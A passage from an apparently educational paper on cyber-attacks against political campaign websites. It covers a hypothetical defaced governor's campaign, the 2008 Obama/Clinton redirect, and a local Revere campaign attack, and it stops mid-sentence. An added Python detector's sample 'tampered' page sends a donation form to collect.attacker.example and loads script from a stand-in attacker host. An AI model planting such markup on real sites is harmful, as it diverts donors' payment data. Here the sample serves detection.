Once upon a time, a candidate had to excel at kissing babies and stump speeches. These were the major ways in which the candidate got his -- or much less frequently her -- image out to voters. All that the candidate's staff had to do was to ensure that reporters and photographers showed up at the right time to capture the choreographed images. The world of politicking today has been entirely transformed by the use of virtual communication, both websites and social media. Campaign staffs must not only be ever-vigilant for the unscripted moment on the trail in which the candidate is caught with the rabbit-in-the-headlights look; they must also be constantly on the lookout for attacks on websites that will either distort the candidate's message or shut down the candidate's ability to get that message out. This paper begins with a scenario of a malicious code attack on a candidate's website and the ways in which the candidate's technical staff fights back against the attack.
The scene of the crime is the website of a candidate for governor. She belongs to the party not in power in the state and would therefore be considered very much a long shot. No one from her party has won the statehouse in over 20 years. However, this candidate has a number of advantages. She served in the army in both Iraq and Afghanistan. While she could not serve in a combat position because of her gender, she effectively saw action as a transport driver and several times saved the lives of other soldiers by helping to evacuate them. She is also a former Olympic-class sprinter and successfully raised her seven younger siblings after their parents were killed in a car accident. Her biography, along with a keen mind, sensible ideas, and an ability to connect with people from all backgrounds, has made her a political star.
However, just as her campaign is getting off the ground and gaining contributions from across the state -- and indeed across the nation -- information starts showing up on her website that distorts her record in ways that are potentially especially harmful. One entry states that she is adamantly opposed to all agricultural subsidies, a position that she has not taken and that is politically perilous in her agrarian state. Another page, one outlining her military service, ends with the false claim that she was given a general rather than an honorable discharge, a red flag to anyone who has served in the military.
Yet more information on the page suggests that those siblings of hers have served repeated jail terms, including several for sex-related crimes, something that (if true) would certainly drive away many of the family-oriented voters in her state.
And if all of this weren't bad enough, a number of the candidate's donors have made police reports that the credit cards that they used to make donations to the candidate through her website (a common use for political websites) seem to have been compromised because fraudulent charges have shown up on them. This would be a serious problem if the donors were larger ones, but in fact most of those who have been affected were those who contributed very small amounts, on average less than twenty dollars. These are the donors who can least afford a financial attack and those who are most likely to turn against the candidate as a result.
An Increasing Threat to the Democratic Process
While the above scenario is indeed hypothetical, it is also realistic. The 2008 presidential campaign, the first in which the internet proved to be a central mechanism, saw a number of cyber-attacks, including an attack that diverted traffic from the website of Barack Obama to that of Hillary Clinton while the two were still rivals for the Democratic nomination.
While the attack was discovered relatively quickly with little serious damage done, if it had gone undetected and the designers of the attack had been sufficiently malicious, there could have been significant consequences, including the funneling of money donated to Obama to another source.
Also, according to Opensecrets.org, a website that reports on monies raised and spent in political campaigns, $17 million has already been spent on web media in the 2008 primaries. By exploiting vulnerabilities in the candidates' websites, West said, there is not only the loss of access to a potential constituency, but also a potential financial loss.
The recent exploit on the Obama and Clinton sites was very crude, but it could be a hint of things to come, Bill Pennington, vice president of services at WhiteHat Security, told SCMagazineUS.com.
"They could rewrite the HTML code to have money go to Hillary when it was meant to go to Obama," he said.
Zulfikar Ramzan of Symantec Security Response agreed. Although he said this type of XSS assault is common and this particular exploit made news because of the site's high profile, Ramzan said it would be easy for a hacker to use the site in a more malicious way. (Poremba, 2008)
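As an added illustration (not part of the cited article or of any campaign's own code), one way a site's staff could detect the kind of HTML rewriting described above is to scan the donation page for form, script, iframe and redirect targets that point to hosts outside an approved list. The host names and both sample pages are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Assumption: hypothetical campaign host and payment processor.
ALLOWED_HOSTS = {"www.candidate.example", "pay.processor.example"}
# Attributes that send the visitor, or the visitor's data, somewhere.
WATCHED = {("form", "action"), ("script", "src"), ("iframe", "src")}


class OffsiteTargetFinder(HTMLParser):
    """Collect form, script, iframe and meta-refresh targets on unlisted hosts."""

    def __init__(self, page_url, allowed_hosts):
        super().__init__()
        self.page_url, self.allowed, self.findings = page_url, allowed_hosts, []

    def _check(self, tag, attr, value):
        # Resolve relative URLs against the page so "/donate" counts as same-site.
        host = urlparse(urljoin(self.page_url, value.strip())).hostname
        if host not in self.allowed:
            self.findings.append((tag, attr, host))

    def handle_starttag(self, tag, attrs):
        attrs = {name: (value or "") for name, value in attrs}
        for watched_tag, attr in WATCHED:
            if tag == watched_tag and attr in attrs:
                self._check(tag, attr, attrs[attr])
        # <meta http-equiv="refresh" content="0;url=..."> redirects the visitor.
        if tag == "meta" and attrs.get("http-equiv", "").lower() == "refresh":
            target = attrs.get("content", "").partition(";")[2].strip()
            if target.lower().startswith("url="):
                self._check(tag, "refresh", target[4:].strip("'\" "))


def offsite_targets(html, page_url, allowed_hosts=frozenset(ALLOWED_HOSTS)):
    finder = OffsiteTargetFinder(page_url, allowed_hosts)
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample pages (not real campaign markup).
PAGE_URL = "https://www.candidate.example/donate.html"
BASELINE = ('<form action="/donate" method="post"><input name="amount"></form>'
            '<script src="https://pay.processor.example/widget.js"></script>')
TAMPERED = ('<meta http-equiv="refresh" content="0;url=http://rival.example/">'
            '<form action="https://collect.attacker.example/pay" method="post"></form>'
            '<script src="//cdn.attacker.example/x.js"></script>')

if __name__ == "__main__":
    for finding in offsite_targets(TAMPERED, PAGE_URL):
        print("off-site target:", finding)
```

Run on a schedule against the live page, a non-empty result is a signal to compare the page with its last known-good copy before donors use it.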
Political cyber-attacks are most certainly not limited to national campaigns. Even local campaigns have been subject to vicious attacks. One Boston-area attack blended personal and technical elements in a potentially very damaging way.
Shortly after Corey Abrams announced last month that he was running for a seat on the Revere City Council, a caller threatened to post pornography on a website he had created and called coreyabrams.com -- unless the candidate paid him for the domain name.
Abrams, a married father of four, refused and within days graphic pornographic images appeared on the website, according to his campaign manager.
Last week, anti-Semitic and racist postings appeared on the site, including a doctored photograph of Abrams wearing a Star of David, which Jews were forced to wear by the Nazis during the Holocaust.
The cyber attacks on Abrams have turned a barely publicized campaign for the Ward One seat into a criminal investigation and brought condemnation from local leaders.
The Response: Malware Police to the Rescue
The campaign staff quickly realize that they have been the victims of a cyber-attack. However, lacking the technical skills to fight against such an attack, the staff call in a company that focuses on fighting such malicious attacks. The company's first job is to diagnose what has happened. Its consultants begin by looking for malware, a very common form of cyber-attack, although not as well-known to the campaign staff as denial-of-service attacks.
Malware is a broad category of software: the term refers to any software that is constructed to gain secret access to a computer system without the owner's consent (or, therefore, knowledge). The "mal" in the term refers to "malicious," and so malware is always a form of hostile or at least annoying program code. At its most powerful, malware has the potential to do significant harm, as we have seen in our hypothetical scenario above.
The first step taken by the outside technical consultants that the campaign staff have called in is to look for the way that the malware has entered the campaign's computer system. As is clear from the use of such terms as "virus" and "bug" as they are applied to computer systems, humans have constructed software and hardware systems so that in some ways they reflect biological systems. (This should hardly be surprising: Every new technology incorporates past knowledge, and so when people began to design the first computer systems, they modeled them on both mechanical and living systems.) Computers, like human bodies, can only be infected if there is a breach in their "immune" system.
A Breach in the Virtual Immune System
The campaign staff, all in their teens and twenties, are of a generation that knows the basics of computer security, and so they have installed firewalls and anti-viral programs on all of the computer systems that they use. However, they are not experts, as are the cyber-crooks working for their candidate's rival, and they have not been as careful as they should have been in preventing a security breach of their system.
When the staff first became aware that they were under cyber-attack, they ran various diagnostic tests on their systems, which had had their anti-viral programs updated on a daily basis since the campaign quarters were set up. They were unable to find the root of the problem, however, which is not surprising. The first job of any designer of malware is to create a way for it to run undetected in its targeted system. If the malware is easily detected, then the authorized administrator of the system could shut it down or delete it.
The most common way in which malware enters a system is through a Trojan horse, in which it is disguised as something that authorized users want. In this case, the malware was willingly, albeit unwittingly, installed by the campaign staff because it was presented to them as a software system that…